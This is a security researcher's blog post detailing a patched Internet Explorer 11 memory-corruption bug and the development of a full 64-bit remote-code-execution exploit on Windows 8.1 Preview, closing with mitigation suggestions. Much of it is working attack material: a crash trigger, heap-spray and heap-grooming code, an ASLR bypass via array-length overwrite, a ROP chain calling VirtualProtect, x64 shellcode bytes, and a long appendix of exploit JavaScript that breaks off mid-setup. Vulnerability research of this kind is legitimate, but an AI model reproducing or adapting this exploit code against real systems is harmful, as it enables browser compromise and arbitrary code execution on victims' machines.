Wednesday, November 6, 2013

Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview

Note: The vulnerability described here has been patched by Microsoft in October 2013 security update.

Earlier this year, Microsoft announced several security bounty programs one of which was a bounty program for bugs in Internet Explorer 11. I participated in this program and relatively quickly found a memory corruption bug. Although I believed the bug could be exploited for remote code execution, due to lack of time (I just became a father right before the bounty programs started so I had other preoccupations) I haven’t actually developed a working exploit at the time. However, I was interested in the difficulty of writing an exploit for the new OS and browser version so I decided to try to develop an exploit later. In this post, I’ll first describe the bug and then the development of a working exploit for it on 64-bit Windows 8.1 Preview.

When setting out to develop the exploit I didn't strive to make a 100% reliable exploit (The specifics of the bug would have made it difficult and my goal was to experiment with the new platform and not make the next cyber weapon), however I did set some limitations for myself that would make the exercise more challenging:
1. The exploit should not rely on any plugins (so no Flash and no Java). I wanted it to work on the default installation.
2. The exploit must work on 64-bit IE and 64-bit Windows. Because 32-bit would be cheating as many exploit mitigation techniques (such as heap base randomization) aren't really effective on 32-bit OS or processes. Additionally, there aren't many 64-bit Windows exploits out there.
3. No additional vulnerabilities should be used (e.g. for ASLR bypass)

One prior note about exploiting 64-bit Internet Explorer: In Windows 8 and 8.1, when running IE on the desktop (“old interface”) the renderer processes of IE will be 32-bit even if the main process is 64-bit. If the new (“touch screen”) interface is used everything is 64-bit. This is an interesting choice and makes the desktop version of IE less secure. So in the default environment, the exploit shown here actually targets the touch screen interface version of IE.

To force IE into using 64-bit mode on the desktop for exploit development, I forced IE to use single process mode (TabProcGrowth registry key). However note that this was used for debugging only and, if used for browsing random pages, it will make IE even less secure because it disables the IE’s sandbox mode.

The bug

A minimal sample that triggers the bug is shown below.

<script>
function bug() {
 t = document.getElementsByTagName("table")[0];
 t.parentNode.runtimeStyle.posWidth = "";
 t.focus();
}
</script>
<body onload=bug()>
<table><th><ins>aaaaaaaaaa aaaaaaaaaa

And here is the the debugger output.

(4a8.440): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Layout::ContainerBox::ContainerBox+0x1e6:
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> r
rax=000000a6d1466170 rbx=000000a6d681c360 rcx=000000000000007f
rdx=0000000001ffffff rsi=000000a6d5960330 rdi=00000000ffffffff
rip=00007ff8e0c90306 rsp=000000a6d61794b0 rbp=000000a6d5943a90
r8=0000000000000001  r9=0000000000000008 r10=00000000c0000034
r11=000000a6d61794a0 r12=00000000ffffffff r13=00000000ffffffff
r14=000000000000000b r15=00000000ffffffff
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!Layout::ContainerBox::ContainerBox+0x1e6:
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> k
Child-SP          RetAddr           Call Site
000000a6`d61794b0 00007ff8`e0e49cc0 MSHTML!Layout::ContainerBox::ContainerBox+0x1e6
000000a6`d6179530 00007ff8`e0e554a8 MSHTML!Layout::TableGridBox::TableGridBox+0x38
000000a6`d6179590 00007ff8`e0e553c2 MSHTML!Layout::TableGridBoxBuilder::CreateTableGridBoxBuilder+0xd8
000000a6`d6179600 00007ff8`e0c8b720 MSHTML!Layout::LayoutBuilder::CreateLayoutBoxBuilder+0x2c9
000000a6`d61796c0 00007ff8`e0c8a583 MSHTML!Layout::LayoutBuilderDriver::StartLayout+0x85f
000000a6`d61798d0 00007ff8`e0c85bb2 MSHTML!Layout::PageCollection::FormatPage+0x287
000000a6`d6179a60 00007ff8`e0c856ae MSHTML!Layout::PageCollection::LayoutPagesCore+0x2aa
000000a6`d6179c00 00007ff8`e0c86389 MSHTML!Layout::PageCollection::LayoutPages+0x18e
000000a6`d6179c90 00007ff8`e0c8610f MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x251
000000a6`d6179db0 00007ff8`e0df85ca MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd7
000000a6`d6179e70 00007ff8`e12d472d MSHTML!CMarkupPageLayout::DoLayout+0x76
000000a6`d6179eb0 00007ff8`e0d9de95 MSHTML!CView::EnsureView+0xcde
000000a6`d617a270 00007ff8`e0d1c29e MSHTML!CElement::EnsureRecalcNotify+0x135
000000a6`d617a310 00007ff8`e1556150 MSHTML!CElement::EnsureRecalcNotify+0x1e
000000a6`d617a350 00007ff8`e1555f6b MSHTML!CElement::focusHelperInternal+0x154
000000a6`d617a3b0 00007ff8`e19195ee MSHTML!CElement::focus+0x87
000000a6`d617a400 00007ff8`e06ed862 MSHTML!CFastDOM::CHTMLElement::Trampoline_focus+0x52
000000a6`d617a460 00007ff8`e06f0039 jscript9!amd64_CallFunction+0x82
000000a6`d617a4b0 00007ff8`e06ed862 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x154
000000a6`d617a550 00007ff8`e06f26ff jscript9!amd64_CallFunction+0x82

As can be seen above, IE crashes in MSHTML!Layout:ContainerBox:ContainerBox function while attempting to read uninitialized memory pointed to by rax + rdx*8. rax actually points to valid memory that contains a CFormatCache object (which looks correct given the PoC), while the value of rdx (0x0000000001ffffff) is interesting. So I looked at the code of ContainerBox:ContainerBox function to see where this value comes from and also what can be done if an attacker would control the memory at rax + 0xffffff8.

00007ffb`dac00145 83cdff          or      ebp,0FFFFFFFFh
...
00007ffb`dac0023e 440fb64713      movzx   r8d,byte ptr [rdi+13h]
00007ffb`dac00243 410fb6c0        movzx   eax,r8b
00007ffb`dac00247 c0e805          shr     al,5
00007ffb`dac0024a 2401            and     al,1
00007ffb`dac0024c 0f84048f6200    je      MSHTML!Layout::ContainerBox::ContainerBox+0x562 (00007ffb`db229156)
00007ffb`dac00252 440fb76f68      movzx   r13d,word ptr [rdi+68h]
...
00007ffb`db229156 448bed          mov     r13d,ebp
00007ffb`db229159 e9f9709dff      jmp     MSHTML!Layout::ContainerBox::ContainerBox+0x137 (00007ffb`dac00257)
...
00007ffb`dac002db 410fbffd        movsx   edi,r13w
...
00007ffb`dac002fb 8bcf            mov     ecx,edi
00007ffb`dac002fd 8bd7            mov     edx,edi
00007ffb`dac002ff 48c1ea07        shr     rdx,7
00007ffb`dac00303 83e17f          and     ecx,7Fh
00007ffb`dac00306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:0000007a`390257f8=????????????????
00007ffb`dac0030a 488d0c49        lea     rcx,[rcx+rcx*2]
00007ffb`dac0030e 488d14c8        lea     rdx,[rax+rcx*8]
00007ffb`dac00312 8b4cc810        mov     ecx,dword ptr [rax+rcx*8+10h]
00007ffb`dac00316 8b420c          mov     eax,dword ptr [rdx+0Ch]
00007ffb`dac00319 3bc8            cmp     ecx,eax
00007ffb`dac0031b 0f83150d7500    jae     MSHTML!Layout::ContainerBox::ContainerBox+0x750f16 (00007ffb`db351036)
00007ffb`dac00321 ffc0            inc     eax
00007ffb`dac00323 89420c          mov     dword ptr [rdx+0Ch],eax

The value of rdx at the time of crash comes after several assignments from the value of ebp which is initialized to 0xFFFFFFFF near the beginning of the function (note that ebp/rbp is not used as the frame pointer here). My assumption is that the value 0xFFFFFFFF (-1) is an initial value of variable used as an index into CFormatCache. Later in the code, a pointer to a CTreeNode is obtained, a flag in the CTreeNode is examined and if it is set, the index value is copied from the CTreeNode object. However, if the flag is not set (as is the case in the PoC), the initial value is used. The value 0xFFFFFFFF is then split into two parts, upper and lower (it looks like CFormatCache is implemented as a 2D array). A value of the higher index (will be equal to 0x1ffffff) will be multiplied by 8 (size of void*), this offset is added to rax and the content at this memory location is written back to rax. Then, a value of the lower index (will be 0x7f) is multiplied with 24 (presumably the size of CCharFormat element), this offset is added to eax and the content of this memory location is written to rdx. Finally, and this is the part relevant for exploitation, a number at [rdx+0C] is taken, increased, and then written back to [rdx+0C].

Written in C++ and simplified a bit, the relevant code would look like this:

int cacheIndex = -1;
if(treeNode->flag) {
  cacheIndex = treeNode->cacheIndex;
} 
unsigned int index_hi = cacheIndex, index_lo = cacheIndex;
index_hi = index_hi >> 7;
index_lo = index_lo & 0x7f;
//with sizeof(formatCache[i]) == 8 and sizeof(formatCache[i][j]) == 24
formatCache[index_hi][index_lo].some_number++; 

For practical exploitation purposes, what happens is this: A pointer to valid memory (CFormatCache pointer) is increased by 0x0FFFFFF8 (256M) and the value at this address is treated as another pointer. Let’s call the address (CFormatCache address + 0x0FFFFFF8) P1 and the address it points to P2. The DWORD value at (P2 + BF4) will be increased by 1 (Note: BF4 is computed as 0x7F * 3 * 8 + 0x0C).

The exploit

If we were writing an exploit for a 32-bit process, a straightforward (though not very clean) way to exploit the bug using heap spraying would be to spray with a 32-bit number such that when BF4 is added to it, an address of something interesting (e.g. string or array length) is obtained. An “address of something interesting” could be predicted by having another heap spray consisting of “interesting objects”.

Since the exploit is being written for 64-bit process with full ASLR, we won’t know or be able to guess an address of an “interesting” object. We certainly won’t be able to fill an address space of a 64-bit process and heap base will be randomized, thus making addresses of objects on the heap unpredictable.

Heap spraying lives

However, even in this case, heap spraying is still useful for the first part of the exploit. Note that when triggering the bug, P1 is calculated as a valid heap address increased by 0x0FFFFFF8 (256M). And if we heap spray, we are allocating memory relative to the heap base. Thus, by spraying approximately 256M of memory we can set P2 to arbitrary value.

So to conclude, despite significantly larger address space in 64-bit processes and heap base randomization, heap spraying is still useful in cases where we can make a vulnerable application dereference memory at a valid heap address + a large offset. As this is a typical behavior for bounds checking vulnerabilities, it’s not altogether uncommon. Besides the bug being discussed here, the previous IE bug I wrote about exploiting here also exhibits this behavior.

Although heap spraying is often avoided in modern exploits in favor of the more reliable alternatives, given a large (fixed) offset of 256M, it is pretty much required in this case. And although the offset is fixed, it’s a pretty good value as far as heap spraying goes. Not too large to cause memory exhaustion and not too small to cause major reliability issues (other than those from using heap spraying in the first place).

Look Ma, no Flash

But the problem of not being able to guess an address of an interesting object still remains, and thus the question is, what do we heap spray with? Well, instead of heap spraying with the exact values, we can spray with pointers instead. Since an offset of 0xBF4 is added to P2 before increasing the value it points to, we’ll spray with an address of some object and try to make this address + 0xBF4 point to something of interest.

So what should “something of interest” be? The first thing I tried is a length of a JavaScript string as in here. And although I was able to align the stars to overwrite higher dword of a qword containing a string length, a problem arose: JavaScript string length is treated as a 32-bit number. Note that most pointers (including those we can easily use in our heap spray) on 64-bit will be qword aligned and when adding an offset of 0xBF4 to such a pointer we will end up with a pointer to higher dword in a qword-aligned memory. So an interesting value needs to either be 64-bit or not qword aligned.

Another idea was to try to overwrite an address. However, note that triggering the bug would increase the address by 4GB as (assuming a qword-aligned address) we are increasing the higher dword. To control the content at this address we would need another heap spray of ~4G data and this would cause memory issues on computers with less free RAM than that. Incidentally, the computer I ran Windows 8.1 Preview VM on had only 4GB of RAM and the Windows 8.1 VM had just 2GB of RAM so I decided to drop this idea and look at alternatives.

In several recent exploits used in the wild, a length of a Flash array was overwritten to leverage a vulnerability. While Flash was off limits in this exercise, let’s take a look at JavaScript arrays in IE 11 instead. As it turns out, there is an interesting value that is correctly aligned. An example JavaScript Array object with explanation of some of the fields is shown below. Note that the actual array content may be split across several buffers.



offset:0, size:8 vtable ptr
offset:0x20, size:4 array length
offset:0x28, size:8 pointer to the buffer containing array data
[beginning of the first buffer, stored together with the array]
offset:0x50, size:4 index of the first element in this buffer
offset:0x54, size:4 number of elements currently in the buffer
offset:0x58, size:4 buffer capacity
offset:0x60, size:8 ptr to the next buffer
offset:0x68, size:varies array data stored in the buffer

Although it’s not necessary for understanding the exploit, here’s also an example String object with explanation of some of the fields.



offset:0, size:8 vtable ptr
offset:0x10, size:4 string length
offset:0x18, size:8 data ptr

As can be seen from above, the “number of elements currently in the buffer” of a JavaScript array is not qword-aligned and is a value that might be interesting to overwrite.

This is indeed the value I ended up going for. To accomplish this, I got the memory aligned as seen in the image below.




We’ll heap spray with pointers to a JavaScript String object by creating large JavaScript arrays where each element of the array will be the same string object. We’ll also get memory aligned in such a way that, at an offset 0xBF4 from the start of the string, there will be a a part of a JavaScript array that holds the value we want to overwrite.

You might wonder why I heap sprayed with pointers to String and not an Array object. The reason for this is that the String object is much smaller (32 bytes vs. 128 bytes) so by having multiple strings close to one another and pointing to a specific one, we can better “aim” for a specific offset inside an Array object. Of course, if we have several strings close to one another, the question becomes which one to use in a heap spray. Since an Array object is 4 time the size of a String, there are four different offsets in the Array we can overwrite. By choosing randomly, in one case (with probability 1/4), we will overwrite exactly what we want. In one case, we will overwrite an address that will cause a crash on a subsequent access of the array. And in the remaining two cases, we will overwrite values that are not important and we would be able to try again by spraying with a pointer to a different string. Thus a blind guess will give success probability of 1/4 while a try/retry approach would give a probability of success of 3/4 (if you know your statistics, you might think that this number is wrong, but we can actually avoid crashes after an incorrect but non-fatal attempt by trying different strings in a descending order). An even better approach would be to disclose the string offsets by first aligning memory in a way to put something readable at an offset 0xBF4 from the String object used in the heap spray. While I have observed that this is possible, this isn’t implemented in the provided exploit code and is left as an exercise for the reader. Refer to the next section for information that could help you to achieve such alignment.

In the exploit code provided, a naive (semi)blind-guess approach is used where there is a large array of Strings (strarr) and a string at a constant index is used for the heap spray. I have observed that this works reliably for me when opening the PoC in a new process/tab (so I didn’t have any other JavaScript objects in the current process). If you want to play with the exploit and the index I used doesn’t work for you, you’ll likely need to pick a different one or implement one of the approaches described above.

Feng Shui in JavaScript heap

Before moving on with the exploit, let’s first take some time to examine how it’s possible to heap spray in IE11 and get a correct object alignment on heap with a high reliability.

Firstly, heap spraying: While Microsoft has made it rather difficult to heap spray with JavaScript strings, JavaScript arrays in IE11 appear not to prevent this in any way. It’s possible to spray both with pointers (as seen above) as well as with absolute values by e.g. creating a large array of integers. While many recent IE exploits use Flash for heap spraying, it’s not necessary and, given the current Array implementation and improved speed over the predecessors, JavaScript arrays might just be the object of choice to implement heap spraying in IE in the future.

Secondly, alignment of objects on heap: While the default Heap implementation in Windows 8 and above (the low fragmentation heap) includes several mitigations that make getting the desired alignment difficult, such as guard pages and allocation order randomization, in IE11 basic JavaScript objects (such as Arrays and Strings) use a custom heap implementation that has none of these features.

I’ll shortly describe what I observed about this JavaScript heap implementation. Note that all of the below is based on observation of the behavior and not reverse-engineering the code, so I might have made some wrong conclusions, but it works as described for the purposes of the given exploit.

The space for the JavaScript objects is allocated in blocks of 0x20000 bytes. If more space is needed, additional blocks will be allocated and there is nothing preventing these blocks to be right next to one another (so a theoretical overflow in one block could write into another).

These blocks are further divided into bins of 0x1000 bytes (at least for small objects). One bin will only hold objects of the same size and possibly type. So for example, in this exploit where we have String and Array objects of size 32 and 128 bytes respectively, some bins will hold only String objects (128 of them at most), while some of them will hold only Array objects (32 of them at most). When a bin is fully used, it contains only the “useful” content and no metadata. I have also observed that the objects are stored in separate 0x20000-size blocks than the user-provided content, so string and array data will be stored in different blocks than the corresponding String and Array objects, except when the data is small enough to be stored together with the object (e.g. single-character strings, small arrays like the 5-element ones in the exploit).

The allocation order of objects inside a given bin is sequential. That means that, e.g. if we create three String objects in close succession and assuming no holes in any of the bins, they will be next to each other with the first one having the lowest address, followed by the second followed by the third.

And now, for my next trick

So at this point we can increment the number of elements in the JavaScript array. In fact, we’ll trigger the vulnerability multiple times (5 times in the provided exploit, where each trigger will increase this number by 3) in order to increase it a bit more. Unfortunately, increasing the number of elements does not allow us to write data past the end of the buffer, but it does allow us to read data past the end. This is sufficient at this point because it allows us to break ASLR and learn the precise address of the Array object we overwrote.

Knowing the address of the Array object, we can repeat the heap spray, but this time, we’ll spray with exact values (I used Array of integers to spray with the exact values). A value we are going to spray with is going to be an address of buffer capacity of an array decreased by 0xBF1. This means that that the spray value + 0xBF4 will be the address of the highest byte of the buffer capacity value. After the buffer capacity has been overwritten, we’ll be able to both read and write data past the end of the JS Array’s buffer.

From here, we can quite easily get the two important elements that constitute a modern browser exploit: The ability to read arbitrary memory and to gain control over RIP.

We can read arbitrary memory by scanning the memory after the Array for a String object and then overwriting the data pointer and (if we want to read larger data) size of the string.

We can get control over RIP by overwriting a vtable pointer of a nearby Array object and triggering a virtual method call. While IE10 introduced Virtual Table Guard (vtguard) for some classes in mshtml.dll, jscript9.dll has no such protections. However note that, having arbitrary memory disclosure, even if vtguard was present it would be just a minor annoyance.

64-bit exploits for 32-bit exploit writers

With control over RIP and memory disclosure, we’ll want to construct a ROP chain in order to defeat DEP. As we don’t control the stack, the first thing we need is a stack pivot gadget. So, with arbitrary memory disclosure it should be easy to search for xchg rax,rsp; ret; in some executable module, right? Well, no. As it turns out, in x64, stack pivot gadgets are much less common than in x86 code. On x86, xchg eax,esp; ret; will be just 2 bytes in size, so there will be many unintended sequences like that. On x64 xchg rax,rsp; is 3 bytes which makes it much less common. Having not found it (or any other “clean” stack pivot gadgets) in mshtml.dll and jscript9.dll, I had to look for alternatives. After a look at mshtml.dll I found a stack pivot sequence shown below which isn’t very clean but does the trick assuming both rax and rcx point to a readable memory (which is the case here).

00007ffb`265ea973 50              push    rax
00007ffb`265ea974 5c              pop     rsp
00007ffb`265ea975 85d2            test    edx,edx
00007ffb`265ea977 7408            je      MSHTML!CTableLayout::GetLastRow+0x25 (00007ffb`265ea981)
00007ffb`265ea979 8b4058          mov     eax,dword ptr [rax+58h]
00007ffb`265ea97c ffc8            dec     eax
00007ffb`265ea97e 03c2            add     eax,edx
00007ffb`265ea980 c3              ret
00007ffb`265ea981 8b8184010000    mov     eax,dword ptr [rcx+184h]
00007ffb`265ea987 ffc8            dec     eax
00007ffb`265ea989 c3              ret

Note that, while there is a conditional jump in the sequence, both branches end with RET and won’t cause a crash so they both work well for our purpose. While the exploit mostly relies on jscript9 objects, an address of (larger) mshtml.dll module can be easily obtained using memory disclosure by pushing a mshtml object into a JS array object we can read and then following references from the array to mshtml object and its vtable.

After the control of the stack is gained, we can call VirtualProtect to make a part of heap we can write to executable. We can find the address of VirtualProtect in the IAT of mshtml.dll (the exploit includes some very basic PE32+ parsing). So, with the address of VirtualProtect and control over the stack, we can now just put the correct arguments of on the stack and return into VirtualProtect, right? Well, no. In 64-bit Windows, a different calling convention is used than in 32-bit. 64-bit Windows uses a fastcall convention where the first 4 arguments (which is exactly the number of arguments VirtualProtect has) are passed through registers RCX, RDX, R8 and R9 (in that order). So we need some additional gadgets to load the correct argument into the correct registers:

pop rcx; ret;
pop rdx; ret;
pop r8; ret;
pop r9; ret;

As it turns out the first three are really common in mshtml.dll. The forth one isn’t, however for VirtualProtect the last argument just needs to point to a writeable memory which is already the case at the time we get control over RIP, so we don’t actually have to change r9.

The final ROP chain looks like this:

address of pop rcx; ret;
address on the heap block with shellcode
address of pop rdx; ret;
0x1000 (size of the memory that we want to make executable)
address of pop r8; ret;
0x40 (PAGE_EXECUTE_READWRITE)
address of VirtualProtect
address of shellcode

So, we can now finally execute some x64 shellcode like SkyLined’s x64 calc shellcode that works on 64-bit Windows 7 and 8, right? Well, no. Shellcode authors usually (understandably) prefer small shellcode size over generality and save space by relying on specifics of the OS that don’t need to be true in the future versions. For example, for compatibility reasons, Windows 7 and 8 store PEB, module information structures as well as ntdll and kernel32 modules at addresses lower than 2G. This is no longer true in Windows 8.1 Preview. Also, while Windows x64 fastcall calling convention requires leaving 32 bytes of shadow space on the stack for the use of calling function, SkyLined’s win64-exec-calc-shellcode leaves just 8 bytes before calling WinExec. While this appears to work on Windows 7 and 8, on Windows 8.1 preview it will cause the command string (“calc” in this case) stored on the stack to be overwritten as it will be stored in WinExec’s shadow space. To resolve these compatibility issues I made modifications to the shellcode which I provided in the exploit. It should now work on Windows 8.1.

That’s it, finally we can execute the shellcode and have thus proven arbitrary code execution. As IE is fully 64-bit only in the touch screen mode, I don’t have a cool screenshot of Windows Calculator popped over it (calc is shown on the desktop instead). But I do have a screenshot of the desktop with IE forced into a single 64-bit process.




The full exploit code can be found at the end of this blog post.

Conclusion

Although Windows 8/8.1 packs an impressive arsenal of memory corruption mitigations, memory corruption exploitation is still alive and kicking. Granted, some vulnerability classes might be more difficult to exploit, but the vulnerability presented here was the first one I found in IE11 and there are likely many more vulnerabilities that can be exploited in a similar way. The exploit also demonstrates that, under some conditions, heap spraying is still useful even in 64-bit processes. In general, while there have been a few cases where it was more difficult to write parts of the exploit on x64 than it would be on x86 (such as finding what to spray with and overwrite, finding stack pivot sequences etc.), the difficulties wouldn't be sufficient to stop a determined attacker.

Finally, based on what I've seen, here are a few ideas to make writing exploits for IE11 on Windows 8.1 more difficult:
  • Consider implementing protection against heap spraying with JavaScript arrays. This could be implemented by RLE-encoding large arrays that consist of a single repeated value or several repeated values.
  • Consider implementing the same level of protection for the JavaScript heap as for the default heap implementation - add guard pages and introduce randomness.
  • Consider implementing Virtual Table Guard for common JavaScript objects.
  • Consider making compiler changes to remove all stack pivot sequences from the generated code of common modules. These are already scarce in x64 code so there shouldn't be a large performance impact.


Appendix: Exploit Code

<script>
 
 var magic = 25001; //if the exploit doesn't work for you try selecting another number in the range 25000 -/+ 128
 var strarr = new Array();
 var arrarr = new Array();
 var sprayarr = new Array();
 var numsploits;
 var addrhi,addrlo;
 var arrindex = -1;
 var strindex = -1;
 var strobjidx = -1;
 var mshtmllo,mshtmlhi;

 //calc shellcode, based on SkyLined's x64 calc shellcode, but fixed to work on win 8.1
 var shellcode = [0x40, 0x80, 0xe4, 0xf8, 0x6a, 0x60, 0x59, 0x65, 0x48, 0x8b, 0x31, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x4f, 0x3c, 0x8b, 0x5c, 0x0f, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x4c, 0x1f, 0x24, 0x48, 0x01, 0xf9, 0x31, 0xd2, 0x0f, 0xb7, 0x2c, 0x51, 0xff, 0xc2, 0xad, 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xf0, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x31, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xff, 0xd7, 0xcc, 0, 0, 0, 0];

//triggers the bug
function crash(i) {
 numsploits = numsploits + 1;
 t = document.getElementsByTagName("table")[i];
 t.parentNode.runtimeStyle.posWidth = -1;
 t.focus();
 setTimeout(cont, 100);  
}

//heap spray
function spray() {
 var aa = "aa";

 //create a bunch of String and Array objects
 for(var i=0;i<50000;i++) {
   strarr[i] = aa.toUpperCase();
   arrarr[i] = new Array(1,2,3,4,5);
 }

 //heap-spray with pointers to a String object
 for(var i=0;i<2000;i++) {
   var tmparr = new Array(16000);
   for(var j=0;j<16000;j++) {
     tmparr[j] = strarr[magic];
   }
   sprayarr[i] = tmparr;
 }

 crash(0);
}

function cont() {
 if(numsploits < 5) {
   crash(numsploits);
   return;
 }
 if(numsploits < 6) {
   setTimeout(afterFirstOverwrite, 0);
   return;
 }
 //alert("done2");
 afterSecondOverwrite();
}

function afterFirstOverwrite() {
 //check which array was overwritten
 for(var i=24000;i<25000;i++) {
   arrarr[i][18] = 1;
   var a = arrarr[i][4];
   var b = arrarr[i][16];
   var c = arrarr[i][17];
   if(typeof(b)!="undefined") {
     arrindex = i;
     addrlo = b;
     addrhi = c;
     break;
   }
 }
 if(arrindex < 0) {
   alert("Exploit failed, error overwriting array");
   return;
 }
 //alert(arrindex);
 
 //re-spray to overwrite buffer capacity
 for(var i=0;i<2000;i++) {
   sprayarr[i] = new Array(32000);
 }
 CollectGarbage();
 for(var i=0;i<2000;i++) {
   for(var j=0;j<32000;j++) {
     if(j%2 == 0) {
       sprayarr[i][j] = addrlo + 8 - 0xBF4 + 3;
     } else {
       sprayarr[i][j] = addrhi;
     }
   }
 }
 //alert("done");
 crash(numsploits);
}

//unsigned to signed conversion
function u2s(i) {
 if(i>0x80000000) {
   return -(0xFFFFFFFF - i + 1);
 } else {
   return i;
 }
}

//signed to unsigned conversion
function s2u(i) {
 if(i<0) {
   return (0xFFFFFFFF + i + 1);
 } else {
   return i;
 }
}

//memory disclosure helper function, read 32-bit number from a given address
function read32(addrhi, addrlo) {
 arrarr[arrindex][strobjidx + 6] = u2s(addrlo);
 arrarr[arrindex][strobjidx + 7] = addrhi;
 return strarr[strindex].charCodeAt(0) + 0x10000 * strarr[strindex].charCodeAt(1);
}

//memory disclosure helper function, read 16-bit number from a given address
function read16(addrhi, addrlo) {
 arrarr[arrindex][strobjidx + 6] = u2s(addrlo);
 arrarr[arrindex][strobjidx + 7] = addrhi;
 return strarr[strindex].charCodeAt(0);
}

function afterSecondOverwrite() {
 arrindex = arrindex + 1;
 //adjusts the array length - gives us some space to read and write memory
 arrarr[arrindex][2+0x5000/4] = 0;
 //search for the next string object and overwrite its length and content ptr to write jscript9
 for(var i=1;i<=5;i++) {
   if((arrarr[arrindex][2 + i*0x400 - 0x20] == 2) && (arrarr[arrindex][3 + i*0x400 - 0x20] == 0)) {
     //alert("found");
     strobjidx = i*0x400 - 0x20 - 2;
     arrarr[arrindex][strobjidx+4] = 4;
     for(var j=20000;j<30000;j++) {
       if(strarr[j].length != 2) {
         strindex = j;
         break;
       }
     }
     break;
   }
 }
 if(strindex < 0) {
   alert("Exploit failed, couldn't overwrite string length");
   return;
 }
 //alert("mshtml");

 //create a mshtml object and follow references to its vtable ptr
 var lo1,hi1,lo2,hi2;
 arrarr[arrindex+1][0] = document.createElement("button");
 lo1 = s2u(arrarr[arrindex][6+0x28/4]);
 hi1 = arrarr[arrindex][6+0x28/4 + 1];
 lo2 = read32(hi1, lo1+0x18);
 hi2 = read32(hi1, lo1+0x18+4);
 mshtmllo = read32(hi2, lo2+0x20);
 mshtmlhi = read32(hi2, lo2+0x20+4);
 //find the module base
 mshtmllo = mshtmllo - mshtmllo % 0x1000;
 while(mshtmllo>0) {
   if(read16(mshtmlhi,mshtmllo) == 0x5A4D) break;
   mshtmllo = mshtmllo - 0x1000;
 }

 //find the address of VirtualProtect in the IAT
 var coff = read32(mshtmlhi, mshtmllo + 0x3C);
 var idata = read32(mshtmlhi, mshtmllo + coff + 4 + 20 + 120);
 var iat = read32(mshtmlhi, mshtmllo + idata + 16);
 var vplo =  read32(mshtmlhi, mshtmllo + iat + 0x8a8);
 var vphi =  read32(mshtmlhi, mshtmllo + iat + 0x8a8 + 4);
 //alert(mshtmlhi.toString(16)+"'"+mshtmllo.toString(16)+","+vplo.toString(16));

 //find the rop gadgets in mshtml
 var pivotlo = -1;
 arrarr[arrindex][strobjidx + 4] = 0x01000000;
 arrarr[arrindex][strobjidx + 6] = u2s(mshtmllo);
 arrarr[arrindex][strobjidx + 7] = mshtmlhi;
 for(var i=0x800;i<0x900000;i++) {
   if((strarr[strindex].charCodeAt(i) == 0x5C50)
     &&(strarr[strindex].charCodeAt(i+1) == 0xD285)
     &&(strarr[strindex].charCodeAt(i+2) == 0x0874)
     &&(strarr[strindex].charCodeAt(i+3) == 0x408b))
   {
     pivotlo = mshtmllo + i*2;
     break;
   }
   if((strarr[strindex].charCodeAt(i) == 0x508B)
     &&(strarr[strindex].charCodeAt(i+1) == 0x855C)
     &&(strarr[strindex].charCodeAt(i+2) == 0x74D2)
     &&(strarr[strindex].charCodeAt(i+3) == 0x8b08))
   {
     pivotlo = mshtmllo + i*2 + 1;
     break;
   }
 }
 if(pivotlo < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");
   return;
 }
 //alert(pivotlo.toString(16));

 var poprcx = -1;
 for(var i=0x800;i<0x900000;i++) {
   if(strarr[strindex].charCodeAt(i) == 0xC359) {
     poprcx = mshtmllo + i*2;
     break;
   }
 }
 if(poprcx < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");
   return;
 }

 var poprdx = -1;
 for(var i=0x800;i<0x900000;i++) {
   if(strarr[strindex].charCodeAt(i) == 0xC35A) {
     poprdx = mshtmllo + i*2;
     break;
   }
 }
 if(poprdx < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");
   return;
 }

 var popr8 = -1;
 for(var i=0x800;i<0x900000;i++) {
   if((strarr[strindex].charCodeAt(i) == 0x5841) && (strarr[strindex].charCodeAt(i+1) % 256 == 0xC3)) {
     popr8 = mshtmllo + i*2;
     break;
   }
   if((Math.floor(strarr[strindex].charCodeAt(i)/256) == 0x41) && (strarr[strindex].charCodeAt(i+1) == 0xC358)) {
     popr8 = mshtmllo + i*2 + 1;
     break;
   }
 }
 if(popr8 < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");
   return;
 }

 //prepare the fake vtable
 var eaxoffset = 6 + 0x20;
 arrarr[arrindex][eaxoffset + 0x98/4] = u2s(pivotlo);
 arrarr[arrindex][eaxoffset + 0x98/4 + 1] = mshtmlhi;
 //prepare the fake stack
 arrarr[arrindex][eaxoffset] = u2s(poprcx);
 arrarr[arrindex][eaxoffset + 1] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 2] = addrlo;
 arrarr[arrindex][eaxoffset + 3] = addrhi;
 arrarr[arrindex][eaxoffset + 4] = u2s(poprdx);
 arrarr[arrindex][eaxoffset + 5] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 6] = 0x1000;
 arrarr[arrindex][eaxoffset + 7] = 0;
 arrarr[arrindex][eaxoffset + 8] = u2s(popr8);
 arrarr[arrindex][eaxoffset + 9] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 10] = 0x40;
 arrarr[arrindex][eaxoffset + 11] = 0;
 arrarr[arrindex][eaxoffset + 12] = u2s(vplo);
 arrarr[arrindex][eaxoffset + 13] = u2s(vphi);
